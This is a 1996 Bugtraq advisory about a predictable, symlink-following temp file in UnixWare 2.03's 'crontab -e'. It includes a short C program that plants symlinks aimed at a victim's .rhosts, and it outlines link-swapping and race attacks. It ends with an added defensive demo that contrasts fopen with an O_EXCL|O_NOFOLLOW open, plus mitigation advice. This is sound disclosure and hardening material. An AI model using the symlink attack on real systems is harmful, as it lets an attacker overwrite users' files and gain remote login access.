Bugtraq mailing list archives
HOLE: Unixware 2.03: crontab -e
From: Hannu.Laurila () japo fi (Hannu Laurila)
Date: Thu, 29 Aug 1996 18:41:12 +0300
Novell UnixWare 2.03 (UNIX System V Release 4.2 MP):

There seems to be a little security problem with UnixWare's crontab command. I haven't been able to check if this applies to other versions than 2.03.

The 'crontab -e' command creates a temporary file in /tmp to pass the crontab file for editing with a text editor. The name of the file is easily guessable and it seems to be based on the process ID (e.g. /tmp/crontaba00421). 'crontab -e' doesn't check if the file already exists in /tmp and will gladly follow any symbolic links there might be waiting.

A malicious user can create a bunch of symbolic links in /tmp with a little C program, if he knows that someone is going to edit his/her crontab file. The code might be something like this:

    #include <stdio.h>
    #include <unistd.h>

    /* characters the guessed part of the temp-file name is drawn from */
    char *foo = "0123456789ABCDEF";

    int main(void)
    {
        char *ps1, *ps2, s[32];

        /* plant a symlink for every guess of the last two name characters */
        for (ps1 = foo; *ps1; ps1++)
            for (ps2 = foo; *ps2; ps2++) {
                sprintf(s, "/tmp/crontaba002%c%c", *ps1, *ps2);
                symlink("/home/joe/.rhosts", s);   /* where crontab -e will write */
            }
        return 0;
    }

Now when joe edits his crontab file, it will be saved as .rhosts in his home directory. This is dangerous, because crontab files often include nice characters like '*' which act as a wildcard in .rhosts.

The user doesn't have to be joe. A malicious user might build a watchdog which replaces the symbolic link with a new one (e.g. /home/sam/.rhosts) while the user is editing his crontab file (a watchdog which seeks for processes like 'crontab -e' and 'pico /tmp/crontab*'). By replacing the symbolic link while the user is editing the crontab file, a malicious user might also be able to overwrite any file owned by the user.

I haven't checked, but I think that there is also a little race condition possibility when the user exits his editor (and saves the file) and before crontab reads the saved file. If the symbolic link can be replaced with a new one in that period of time, a malicious user might be able to add entries to the user's crontab file.

I haven't checked if this applies to root also.
--- Hannu Laurila - kube () japo fi * Kauppakatu 10, FIN-62900 ALAJÄRVI Alajärven Puhelinosuuskunta * Tel +358 66 557 2209 - Fax +358 66 557 2788
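Added example (editor's code, not part of Hannu's post and not UnixWare's crontab source): the temp-file pattern the report describes, shown as the vulnerable open beside a hardened one. The attacker plants a symlink at the predictable name; a plain fopen("w") follows it and overwrites the target, while open() with O_CREAT|O_EXCL|O_NOFOLLOW refuses the pre-planted link. Everything runs in a private scratch directory made with mkdtemp, the file name "crontaba00421" is the one quoted in the report, and the "victim" file and crontab line are constructed stand-ins for /home/joe/.rhosts and a real crontab entry.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Predictable name from the report; the target is a constructed stand-in
 * for /home/joe/.rhosts living inside the scratch directory. */
#define PRED_NAME "crontaba00421"
#define TARGET    "dot-rhosts"
#define CRON_LINE "0 * * * * /usr/bin/backup\n"   /* constructed; note the '*' wildcards */

static void join(char *out, size_t n, const char *dir, const char *name)
{
    snprintf(out, n, "%s/%s", dir, name);
}

/* Attacker: plant a symlink at the name the victim's crontab -e will use. */
static int plant_symlink(const char *dir, const char *target)
{
    char link[512];
    join(link, sizeof link, dir, PRED_NAME);
    return symlink(target, link);              /* 0 on success */
}

/* Vulnerable pattern: fopen("w") is O_WRONLY|O_CREAT|O_TRUNC with neither
 * O_EXCL nor O_NOFOLLOW, so it follows the planted link and overwrites its target. */
static int vulnerable_write(const char *dir, const char *content)
{
    char path[512];
    join(path, sizeof path, dir, PRED_NAME);
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(content, f);
    return fclose(f);
}

/* Hardened pattern: O_EXCL refuses any pre-existing entry (a symlink included),
 * O_NOFOLLOW refuses to traverse a symlink as the final component.
 * Returns the fd, or -1 with errno set. (mkstemp() adds an unguessable name on top.) */
static int hardened_open(const char *dir)
{
    char path[512];
    join(path, sizeof path, dir, PRED_NAME);
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static int read_file(const char *path, char *buf, size_t n)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t got = fread(buf, 1, n - 1, f);
    buf[got] = '\0';
    fclose(f);
    return 0;
}

/* Run the scenario in a fresh scratch directory. Result is a bitmask:
 *   bit 0: the vulnerable write landed in the target (attack worked)
 *   bit 1: the hardened open refused the planted link (EEXIST or ELOOP)
 * 3 therefore means "vulnerable pattern exploitable, hardened pattern safe". */
int demo_symlink_attack(void)
{
    char dir[] = "/tmp/crontab-demo-XXXXXX";
    char target[512], link[512], got[128];
    int result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    join(target, sizeof target, dir, TARGET);
    join(link, sizeof link, dir, PRED_NAME);

    FILE *t = fopen(target, "w");              /* victim's file starts out empty */
    if (t == NULL) { rmdir(dir); return -1; }
    fclose(t);

    if (plant_symlink(dir, target) == 0 &&
        vulnerable_write(dir, CRON_LINE) == 0 &&
        read_file(target, got, sizeof got) == 0 &&
        strcmp(got, CRON_LINE) == 0)
        result |= 1;

    errno = 0;
    int fd = hardened_open(dir);
    if (fd == -1 && (errno == EEXIST || errno == ELOOP))
        result |= 2;
    else if (fd != -1)
        close(fd);

    unlink(link);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = demo_symlink_attack();
    printf("fopen(\"w\") followed the planted symlink: %s\n", (r & 1) ? "yes" : "no");
    printf("O_EXCL|O_NOFOLLOW open refused it:        %s\n", (r & 2) ? "yes" : "no");
    return r == 3 ? 0 : 1;
}
```

The hardened open only closes the create-time hole; the replace-while-editing race Hannu raises is a separate problem, since the editor is handed a path name and reopens it itself. The usual answer is to keep the temp file in a directory only the user can write (a private mode 0700 directory, or $HOME) rather than in a shared /tmp, so there is nowhere for an attacker to plant or swap a link.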